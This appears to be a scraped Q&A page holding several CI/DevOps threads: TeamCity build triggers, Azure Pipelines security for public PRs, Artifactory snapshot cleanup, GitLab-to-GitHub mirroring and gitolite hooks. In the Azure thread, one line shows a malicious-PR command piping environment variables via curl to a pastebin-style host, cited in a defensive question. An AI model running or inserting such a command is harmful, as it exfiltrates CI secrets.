Trigger teamcity build when network folder changes - teamcity

Can't seem to find this question asked anywhere... but I would like to trigger a teamcity build when a network folder is updated. This is content for our installer, too big to put into github, hence managed by a team internally.
Seems like the sort of thing someone would have written a plugin for, but I can't find one. Does anyone have a solution for this? Ideally I'd just point the trigger at a network folder and teamcity would start a build whenever that folder gets updated.

Not sure if monitoring network folder is good, scalable solution, there are a couple of alternative approaches, which might help in your case:
seems you're already using TeamCity, maybe even building your installer in TeamCity, then you might make use of Snapshot or Atrifact dependencies, or use Finish Build trigger.
you could trigger a build in TeamCity via REST API, by a tool/script uploading your installer to the remote folder, basically just executing POST request (example curl request might look like curl http://teamcity-host/app/rest/buildQueue --request POST --user user:password -H "Content-Type:application/xml" -d "<build><buildType id='buildToTriggerId'/></build>"), here's corresponding REST API documentation.
Update
Actually, there is TeamCity plugin to monitor the content (changes) returned by a specified URL, file or directory, too: Url Build Trigger

Related

Run security checks before rurnning Azure Pipeline CI on public PR

I have a public repo. Random GitHub users are free to create pull requests, and this is great.
My CI pipeline is described in a normal file in the repo called pipelines.yml (we use Azure pipelines).
Unfortunately this means that a random GitHub user is able to steal all my secret environment variables by creating a PR where they edit the pipelines.yml and add a bash script line with something like:
export | curl -XPOST 'http://pastebin-bla/xxxx'
Or run arbitrary code, in general. Right?
How can I verify that a malicious PR doesn't change at least some critical files?
How can I verify that a malicious PR doesn't change at least some critical files?
I am afraid we could not limit the PR doesn't change at least some critical files.
As workaround, we could turn off automatic fork builds and instead use pull request comments as a way to manually building these contributions, which give you an opportunity to review the code before triggering a build.
You could check the document Consider manually triggering fork builds for some more details.

TeamCity API call to get a list of modifications to a build configuration

I'm running TeamCity Enterprise 2019.2.4 (build 72059).
Is there an easy API call to get the username of a person who disabled a build step?
If that is not possible, as I suspect, what's the API endpoint to get a list of all modifications for a build configuration, and then the endpoint to get the contents of that modification?
Mind you, this is not about VCS changes. I know how to get those.
I enabled versioned settings for that project, so I just check the git history for the file that represents the build configuration and parse the commits for the one that disabled the build step.

Jfrog Artifactory: How to delete old snapshot artifacts

I had a task to delete old SNAPSHOT artefacts which are under many folders/directories.
We can't go and delete each and every artefact manually so I would like to go with restAPI.
For clear info:
https://artifactory.com/artifactory/maven-local/com/aa/bbb/cccc/dddd/XYZ-SNAPSHOT/abc.jar
https://artifactory.com/artifactory/maven-local/com/aa/bbb/cccc/dddd/XYZ-SNAPSHOT/xyz.jar
https://artifactory.com/artifactory/maven-local/com/aa/bbb/cccc/eeee/XYZ-SNAPSHOT/pqr.jar
https://artifactory.com/artifactory/maven-local/com/aa/bbb/dddd/eeee/XYZ-SNAPSHOT/lmn.jar
Above 4 examples have different directories.
My script needs to go each and every directory and have to verify for XYZ-SNAPSHOT, if it found then we can make a url and delete through CURL.
How can we achieve this? Or is there any other way to do it?
You should probably want to use Artifactory Query Language (AQL) which is the easiest way to find artifacts and modules according to patterns. You can find bunch of examples in the page. Moreover, to perform the deletion easily and even automate the process in the future, I advise using JFrog CLI. You can also read this interesting blog about similar use case.
Also, there is the 'Max Unique Snapshots' field in your local Maven repository settings. You can use that for Artifactory to keep a specified number of unique snapshots per artifact.

How to push from Gitlab to Github with webhooks

My Google-fu is failing me for what seems obvious if I can only find the right manual.
I have a Gitlab server which was installed by our hosting provider
The Gitlab server has many projects.
For some of these projects, I want that Gitlab automatically pushes to a remote repository (in this case Github) every time there is a push from a local client to Gitlab.
Like this: client --> gitlab --> github
Any tags and branches should also be pushed.
AFAICT I have 3 options:
Configure the local client with two remotes, and push simultaneous to Gitlab and Github. I want to avoid this because developers.
Add a git post-receive hook in the repository on the Gitlab server. This would be most flexible (I have sufficient Linux experience to write shell scripts as git hooks) and I have found documentation on how to do this, but I want to avoid this too because then the hosting provider will need to give me shell access.
I use webhooks in Gitlab. I am unfamiliar with what the very basics of webhooks are, and I am unable to locate understandable documentation or even a simple step-by-step example. This is the documentation from Gitlab that I found and I do not understand it: http://demo.gitlab.com/help/web_hooks/web_hooks
I would appreciate good pointers, and I will summarize and document a solution when I find it.
EDIT
I'm using this Ruby code for a web hook:
class PewPewPew < Sinatra::Base
post '/pew' do
push = JSON.parse(request.body.read)
puts "I got some JSON: #{push.inspect}"
end
end
Next: find out how to tell the gitlab server that it has to push a repository. I am going back to the GitLab API.
EDIT
I think I have an idea. On the server where I run the webhook, I pull from GitLab and then I push to Github. I can even do some "magic" (running tests, building jars, deploying to Artifactory,...) before I push to GitHub. In fact it would be great if Jenkins were able to push to a remote repository after a succesful build, then I wouldn't need to write my own webhook, because I'm pretty sure Jenkins already provides a webhook for Gitlab, either native or via a plugin. But I don't know. Yet.
EDIT
I solved it in Jenkins.
You can set more than one git remote in an Jenkins job. I used Git Publisher as a Post-Build Action and it worked like a charm, exactly what I wanted.
would work of course.
is possible but dangerous because GitLab shell automatically symlinks hooks into repositories for you, and those are necessary for permission checks: https://github.com/gitlabhq/gitlab-shell/tree/823aba63e444afa2f45477819770fec3cb5f0159/hooks so I'd rather stay away from it.
Web hooks are not suitable directly: they make an HTTP request with fixed format on certain events, in your case push, not Git protocol requests.
Of course, you could write a server that consumes the hook, clones and pushes, but a service (single push and no deployment) or GitLab CI (already implements hook management) would be strictly better solutions.
services are a the best option if someone implements it: live in the source tree, would do a single push, and require no extra deployment overhead.
GitLab CI or othe CIs like Jenkins are the best option currently available. They are essentially already implemented server for the webhooks, which automatically clone for you: all you have to do then is to push from them.
The keywords you want to Google for are "gitlab mirror github". That has led me to: Gitlab repository mirroring for instance. There seems to be no perfect, easy solution today.
Also this has already been proposed at the feature request forum at: http://feedback.gitlab.com/forums/176466-general/suggestions/4614663-automatic-push-to-remote-mirror-repo-after-push-to Always check there ;) Go and upvote the request.
The key difficulty now is how to store the push credentials.
I solved it in Jenkins. You can set more than one git remote in an Jenkins job. I used Git Publisher as a Post-Build Action and it worked like a charm, exactly what I wanted.
I added "-publisher" jobs that run after "" is built successfully. I could have done it in one job, but I decided to split it up. The build jobs are triggered by a web hook in GitLab; the publisher jobs are using a #daily schedule from the BuildResultTrigger plugin.

Making gitolite trigger teamcity builds

Rather than having teamcity log onto the gitolite server several tens of thousands of times each day - and also sitting around waiting for the poll to happen (or starting it manually).
It would be nice if it was possible to set it up gitolite hooks that inform TeamCity that the repository has changed.
Is such a configuration possible with TeamCity and gitolite?
I know Jenkins has a github plugin that works nicely - I use that setup for some Minecraft CI I am running privately.
One way would be to gitolite (through a VREF hook) to call TeamCity through its REST API, in order to launch a build through web request.
You just need to make web request to the following URL:
http://YOURSERVER/httpAuth/action.html?add2Queue=btId
, where btId is build type Id – unique identifier for each build configuration.
To get it, you can just look for it in browser address bar, when clicking on build configuration, or use TeamCity REST API for details.
The OP Morten Nilsen didn't need a VREF:
add a file "post-receive" to .gitolite/hooks/common and
run gitolite setup --hooks-only

Resources